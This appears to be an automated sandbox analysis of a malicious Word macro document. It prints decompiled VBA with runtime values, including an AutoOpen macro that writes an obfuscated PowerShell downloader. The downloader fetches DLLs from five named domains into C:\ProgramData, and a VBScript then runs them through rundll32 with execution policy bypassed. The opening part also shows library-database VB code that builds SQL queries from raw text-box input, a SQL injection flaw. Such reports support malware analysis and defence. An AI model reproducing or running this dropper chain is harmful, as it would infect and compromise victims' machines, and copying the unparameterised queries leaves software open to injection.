txtReturned
txtRemarks

Strings | Decrypted Strings
"select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='"
"Returned"

Line | Instruction | Meta Information
123 | Public Sub Returned() |
124 | Set rs = New ADODB.Recordset |
125 | rs.Open "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic | Open, Item, adOpenStatic, adLockOptimistic
126 | frmTrans1.txtCall_no.Text = rs!Call_no | txtCall_no
127 | frmTrans1.txtTitle.Text = rs!Title | txtTitle
128 | frmTrans1.txtAuthor.Text = rs!Author | txtAuthor
129 | frmTrans1.txtACC.Text = rs!Acc_no | txtACC
130 | frmTrans1.txtBorrow.Text = rs!Date_Borrowed | txtBorrow
131 | frmTrans1.txtDue.Text = rs!Date_Due | txtDue
132 | frmTrans1.txtReturned.Text = rs!Date_Returned | txtReturned
133 | frmTrans1.txtRemarks.Text = "Returned" | txtRemarks
134 | End Sub |

APIs | Meta Information
Execute
txtID
txtCall_no
txtTitle
txtAuthor
txtACC
txtBorrow
txtDue
txtReturned
txtRemarks
palen

Strings | Decrypted Strings
"insert into dbo.Tbl_TRANSACTION values(""'"

Line | Instruction | Meta Information
98 | Public Sub OkBorrowed() |
99 | con.Execute "insert into dbo.Tbl_TRANSACTION values(" & "'" & frmTrans1.txtID.Text & "'," & "'" & frmTrans1.txtCall_no.Text & "'," & "'" & frmTrans1.txtTitle.Text & "'," & "'" & frmTrans1.txtAuthor.Text & "'," & "'" & frmTrans1.txtACC.Text & "'," & "'" & frmTrans1.txtBorrow.Text & "'," & "'" & frmTrans1.txtDue.Text & "'," & "'" & frmTrans1.txtReturned.Text & "'," & "'" & frmTrans1.txtRemarks.Text & "')" | Execute, txtID, txtCall_no, txtTitle, txtAuthor, txtACC, txtBorrow, txtDue, txtReturned, txtRemarks
109 | frmTrans1.palen.Caption = 1 | palen
110 | End Sub |

                                                                                              APIs | Meta Information

                                                                                              Execute

                                                                                              txtCall_no

                                                                                              frmTrans1

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              txtID

                                                                                              Strings | Decrypted Strings
                                                                                              "update dbo.Tbl_TRANSACTION set ""Call_no = '"
                                                                                              Line | Instruction | Meta Information
                                                                                              136

                                                                                              Public Sub Returned1()

                                                                                              137

                                                                                              con.Execute "update dbo.Tbl_TRANSACTION set " & "Call_no = '" & frmTrans1.txtCall_no.Text & "', " & "Title = '" & frmTrans1.txtTitle.Text & "', " & "Author='" & frmTrans1.txtAuthor.Text & "', " & "Date_Borrowed='" & frmTrans1.txtBorrow.Text & "', " & "Date_Due='" & frmTrans1.txtDue.Text & "', " & "Date_Returned = '" & frmTrans1.txtReturned.Text & "', " & "Status = '" & frmTrans1.txtRemarks.Text & "'" & "where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.txtID.Text & "'"

                                                                                              Execute

                                                                                              txtCall_no

                                                                                              frmTrans1

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              txtID

                                                                                              147

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              Strings | Decrypted Strings
                                                                                              "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= ""'"
                                                                                              Line | Instruction | Meta Information
                                                                                              19

                                                                                              Public Sub Edit_Book_Tran()

                                                                                              20

                                                                                              Set rs = New ADODB.Recordset

                                                                                              21

                                                                                              rs.Open "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              23

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              24

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              25

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              26

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              27

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtID

                                                                                              lblname

                                                                                              lblmi

                                                                                              lbllast

                                                                                              Strings | Decrypted Strings
                                                                                              "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= ""'"
                                                                                              Line | Instruction | Meta Information
                                                                                              68

                                                                                              Public Sub Datagrid_Trans1()

                                                                                              69

                                                                                              Set rs = New ADODB.Recordset

                                                                                              70

                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              72

                                                                                              frmTrans1.txtID.Text = rs!ID

                                                                                              txtID

                                                                                              73

                                                                                              frmTrans1.lblname.Caption = rs!Firstname

                                                                                              lblname

                                                                                              74

                                                                                              frmTrans1.lblmi.Caption = rs!MI

                                                                                              lblmi

                                                                                              75

                                                                                              frmTrans1.lbllast.Caption = rs!Lastname

                                                                                              lbllast

                                                                                              76

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              Strings | Decrypted Strings
                                                                                              "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= ""'"
                                                                                              Line | Instruction | Meta Information
                                                                                              113

                                                                                              Public Sub Display_list()

                                                                                              114

                                                                                              Set rs = New ADODB.Recordset

                                                                                              115

                                                                                              rs.Open "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              117

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              118

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              119

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              120

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              121

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              txtID

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              Datagrid3

                                                                                              Strings | Decrypted Strings
                                                                                              "select *from Tbl_Transaction where ID ='"
                                                                                              Line | Instruction | Meta Information
                                                                                              78

                                                                                              Public Sub Display_borrower()

                                                                                              79

                                                                                              Set rs = New ADODB.Recordset

                                                                                              80

                                                                                              rs.Open "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtID

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              81

                                                                                              Set frmTrans1.Datagrid3.DataSource = rs

                                                                                              Datagrid3

                                                                                              83

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid1

                                                                                              Strings | Decrypted Strings
                                                                                              "select * from dbo.Tbl_STUDENTS"
                                                                                              Line | Instruction | Meta Information
                                                                                              29

                                                                                              Public Sub View_StudentS_Trans1()

                                                                                              30

                                                                                              Set rs = New ADODB.Recordset

                                                                                              31

                                                                                              rs.Open "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              32

                                                                                              Set frmTrans1.DataGrid1.DataSource = rs

                                                                                              DataGrid1

                                                                                              33

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid4

                                                                                              Strings | Decrypted Strings
                                                                                              "select * from dbo.Tbl_BOOK"
                                                                                              Line | Instruction | Meta Information
                                                                                              91

                                                                                              Public Sub View_Trans3result()

                                                                                              92

                                                                                              Set rs = New ADODB.Recordset

                                                                                              93

                                                                                              rs.Open "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              94

                                                                                              Set frmTrans1.DataGrid4.DataSource = rs

                                                                                              DataGrid4

                                                                                              95

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Execute

                                                                                              Item

                                                                                              Strings | Decrypted Strings
                                                                                              "Delete from dbo.Tbl_TRANSACTION"" where ID = '"
                                                                                              Line | Instruction | Meta Information
                                                                                              149

                                                                                              Public Sub Delete()

                                                                                              150

                                                                                              con.Execute "Delete from dbo.Tbl_TRANSACTION" & " where ID = '" & frmBorrower.DataGrid1.Columns.Item(0).Text & "'"

                                                                                              Execute

                                                                                              Item

                                                                                              152

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              Strings | Decrypted Strings
                                                                                              "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                                                                                              Line | Instruction | Meta Information
                                                                                              6

                                                                                              Public Sub Connect_Student_Trans1()

                                                                                              7

                                                                                              On Error Resume Next

                                                                                              8

                                                                                              Set con = New ADODB.Connection

                                                                                              9

                                                                                              con.Open "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"

                                                                                              Open

                                                                                              11

                                                                                              End Sub

                                                                                              Module: Module3

                                                                                              Declaration
                                                                                              Line | Content
                                                                                              1

                                                                                              Attribute VB_Name = "Module3"

                                                                                              Executed Functions
                                                                                              APIs | Meta Information

                                                                                              Environ

                                                                                              Environ("USERPROFILE") -> C:\Users\Albus

                                                                                              ttt1

                                                                                              Replace

                                                                                              Replace("start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://chaturanga.groopy.com/7SEZBnhMLW/130921.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://lotolands.com/JtaTAt4Ej/130921.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; ","ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ","") -> start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; 
$rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://chaturanga.groopy.com/7SEZBnhMLW/130921.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://lotolands.com/JtaTAt4Ej/130921.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;

                                                                                              ttt2

                                                                                              Replace

                                                                                              Replace("Dim WAITPLZ, WS WAITPLZ = DateAdd(Chr(115), 2, Now()) Do Until (Now() > WAITPLZ) Loop On Error Resume Next BB="Powershell" CC=" -ExecutionPolicy Bypass" SS=" & " FF="%AppData%\www.ps1" OK = BB+CC+QQ+SS+FF Set Ran = CreateObject("WScript.Shell") Ran.Run OK,0 WScript.Sleep(11000) OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr" Ran.Run OK1,0 OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr" Ran.Run OK2,0 OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr" Ran.Run OK3,0 OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr" Ran.Run OK4,0 OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr" Ran.Run OK5,0 ","ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ","") -> Dim WAITPLZ, WS WAITPLZ = DateAdd(Chr(115), 2, Now()) Do Until (Now() > WAITPLZ) Loop On Error Resume Next BB="Powershell" CC=" -ExecutionPolicy Bypass" SS=" & " FF="%AppData%\www.ps1" OK = BB+CC+QQ+SS+FF Set Ran = CreateObject("WScript.Shell") Ran.Run OK,0 WScript.Sleep(11000) OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr" Ran.Run OK1,0 OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr" Ran.Run OK2,0 OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr" Ran.Run OK3,0 OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr" Ran.Run OK4,0 OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr" Ran.Run OK5,0

                                                                                              FreeFile

                                                                                              Open

                                                                                              Open("C:\Users\Albus\AppData\Roaming\www.ps1")

                                                                                              Part of subcall function NoHex@Module3: DateAdd

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              Part of subcall function NoHex@Module3: DoEvents

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              FileSystemObject

                                                                                              MoveFile

                                                                                              Part of subcall function NoHex@Module3: DateAdd

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              Part of subcall function NoHex@Module3: DoEvents

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              Open

                                                                                              Open("C:\Users\Albus\AppData\Roaming\www.txt")

                                                                                              Part of subcall function NoHex@Module3: DateAdd

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              Part of subcall function NoHex@Module3: DoEvents

                                                                                              Part of subcall function NoHex@Module3: Now

                                                                                              GetObject

                                                                                              GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")

                                                                                              Run

                                                                                              IWshShell3.Run("cscript.exe %appdata%\www.txt //E:VBScript //NoLogo %~f0 %*","0") -> 0

                                                                                              Chr

                                                                                              Strings | Decrypted Strings
                                                                                              "USERPROFILE"
                                                                                              "error.txt"
                                                                                              """"
                                                                                              "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"
                                                                                              "new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
                                                                                              "0"
                                                                                              "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo ""%~f0"" %*"
                                                                                              Line | Instruction | Meta Information
                                                                                              10

                                                                                              Sub eFile()

                                                                                              12

                                                                                              Dim QQ1 as Object

                                                                                              executed
                                                                                              13

                                                                                              Set QQ1 = New deutsche

                                                                                              15

                                                                                              On Error Resume Next

                                                                                              17

                                                                                              Dim WW, ff, Ne, ii, ss, hh as String

                                                                                              19

                                                                                              Dim RO, ROI as String

                                                                                              20

                                                                                              RO = Environ("USERPROFILE") & "\AppData\Roaming\"

                                                                                              Environ("USERPROFILE") -> C:\Users\Albus

                                                                                              executed
                                                                                              22

                                                                                              ss = "error.txt"

                                                                                              23

                                                                                              ROI = RO + "www.ps1"

                                                                                              24

                                                                                              ROI2 = RO + "www.txt"

                                                                                              25

                                                                                              ii = ""

                                                                                              26

                                                                                              Ne = "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"

                                                                                              28

                                                                                              WW = QQ1.ttt1.Text

                                                                                              ttt1

                                                                                              29

                                                                                              ff = Replace(WW, Ne, ii)

                                                                                              Replace("start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://chaturanga.groopy.com/7SEZBnhMLW/130921.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://lotolands.com/JtaTAt4Ej/130921.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; ","ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ","") -> start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; 
$rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://chaturanga.groopy.com/7SEZBnhMLW/130921.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://lotolands.com/JtaTAt4Ej/130921.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;

                                                                                              executed
                                                                                              31

                                                                                              WW2 = QQ1.ttt2.Text

                                                                                              ttt2

                                                                                              32

                                                                                              ff2 = Replace(WW2, Ne, ii)

                                                                                              Replace("Dim WAITPLZ, WS WAITPLZ = DateAdd(Chr(115), 2, Now()) Do Until (Now() > WAITPLZ) Loop On Error Resume Next BB="Powershell" CC=" -ExecutionPolicy Bypass" SS=" & " FF="%AppData%\www.ps1" OK = BB+CC+QQ+SS+FF Set Ran = CreateObject("WScript.Shell") Ran.Run OK,0 WScript.Sleep(11000) OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr" Ran.Run OK1,0 OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr" Ran.Run OK2,0 OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr" Ran.Run OK3,0 OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr" Ran.Run OK4,0 OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr" Ran.Run OK5,0 ","ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ","") -> Dim WAITPLZ, WS WAITPLZ = DateAdd(Chr(115), 2, Now()) Do Until (Now() > WAITPLZ) Loop On Error Resume Next BB="Powershell" CC=" -ExecutionPolicy Bypass" SS=" & " FF="%AppData%\www.ps1" OK = BB+CC+QQ+SS+FF Set Ran = CreateObject("WScript.Shell") Ran.Run OK,0 WScript.Sleep(11000) OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr" Ran.Run OK1,0 OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr" Ran.Run OK2,0 OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr" Ran.Run OK3,0 OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr" Ran.Run OK4,0 OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr" Ran.Run OK5,0

                                                                                              executed
                                                                                              34

                                                                                              MyFile = FreeFile

                                                                                              FreeFile

                                                                                              36

                                                                                              Open ROI For Output As # MyFile

                                                                                              Open("C:\Users\Albus\AppData\Roaming\www.ps1")

                                                                                              executed
                                                                                              37

                                                                                              Print # MyFile, ff

                                                                                              38

                                                                                              Close # MyFile

                                                                                              40

                                                                                              NoHex 2

                                                                                              42

                                                                                              Dim fso as New FileSystemObject

                                                                                              FileSystemObject

                                                                                              43

                                                                                              fso.MoveFile RO + ss, ROI

                                                                                              MoveFile

                                                                                              45

                                                                                              NoHex 2

                                                                                              48

                                                                                              Open ROI2 For Output As # MyFile

                                                                                              Open("C:\Users\Albus\AppData\Roaming\www.txt")

                                                                                              executed
                                                                                              49

                                                                                              Print # MyFile, ff2

                                                                                              50

                                                                                              Close # MyFile

                                                                                              52

                                                                                              NoHex 2

                                                                                              55

                                                                                              Dim h11 as Object

                                                                                              56

                                                                                              Set h11 = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")

                                                                                              GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")

                                                                                              executed
                                                                                              58

                                                                                              h11.Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48)

                                                                                              IWshShell3.Run("cscript.exe %appdata%\www.txt //E:VBScript //NoLogo %~f0 %*","0") -> 0

                                                                                              Chr

                                                                                              executed
                                                                                              60

                                                                                              End

                                                                                              61

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Part of subcall function eFile@Module3: Environ

                                                                                              Part of subcall function eFile@Module3: ttt1

                                                                                              Part of subcall function eFile@Module3: Replace

                                                                                              Part of subcall function eFile@Module3: ttt2

                                                                                              Part of subcall function eFile@Module3: Replace

                                                                                              Part of subcall function eFile@Module3: FreeFile

                                                                                              Part of subcall function eFile@Module3: Open

                                                                                              Part of subcall function eFile@Module3: FileSystemObject

                                                                                              Part of subcall function eFile@Module3: MoveFile

                                                                                              Part of subcall function eFile@Module3: Open

                                                                                              Part of subcall function eFile@Module3: GetObject

                                                                                              Part of subcall function eFile@Module3: Run

                                                                                              Part of subcall function eFile@Module3: Chr

                                                                                              Line | Instruction | Meta Information
                                                                                              3

                                                                                              Sub YRJTYSR()

                                                                                              6

                                                                                              Call eFile()

                                                                                              executed
                                                                                              8

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              DateAdd

                                                                                              Now

                                                                                              DoEvents

                                                                                              Now

                                                                                              Strings | Decrypted Strings
                                                                                              "s"
                                                                                              Line | Instruction | Meta Information
                                                                                              63

                                                                                              Public Sub NoHex(ByVal Seconds as Double)

                                                                                              64

                                                                                              Dim EndTime as Date

                                                                                              executed
                                                                                              65

                                                                                              EndTime = DateAdd("s", Seconds, Now)

                                                                                              DateAdd

                                                                                              Now

                                                                                              66

                                                                                              Do

                                                                                              Now

                                                                                              67

                                                                                              DoEvents

                                                                                              DoEvents

                                                                                              68

                                                                                              Loop Until Now >= EndTime

                                                                                              Now

                                                                                              69

                                                                                              End Sub

                                                                                              Module: ThisDocument

                                                                                              Declaration
                                                                                              Line | Content
                                                                                              1

                                                                                              Attribute VB_Name = "ThisDocument"

                                                                                              2

                                                                                              Attribute VB_Base = "1Normal.ThisDocument"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = True

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Executed Functions
                                                                                              APIs | Meta Information

                                                                                              lp

                                                                                              MsgBox

                                                                                              Part of subcall function func1@ThisDocument: DoEvents

                                                                                              Part of subcall function func1@ThisDocument: wdCharacter

                                                                                              Part of subcall function func2@ThisDocument: DoEvents

                                                                                              Part of subcall function func2@ThisDocument: WholeStory

                                                                                              Part of subcall function func2@ThisDocument: DoEvents

                                                                                              Part of subcall function func2@ThisDocument: DoEvents

                                                                                              Strings | Decrypted Strings
                                                                                              " workright "
                                                                                              " There is Error "
                                                                                              " no "
                                                                                              " There is Error "
                                                                                              Line | Instruction | Meta Information
                                                                                              9

                                                                                              Sub AutoOpen()

                                                                                              10

                                                                                              IfYes = " workright "

                                                                                              executed
                                                                                              11

                                                                                              If lp = " no " Then

                                                                                              lp

                                                                                              12

                                                                                              MsgBox (" There is Error ")

                                                                                              MsgBox

                                                                                              13

                                                                                              Else

                                                                                              14

                                                                                              On Error Resume Next

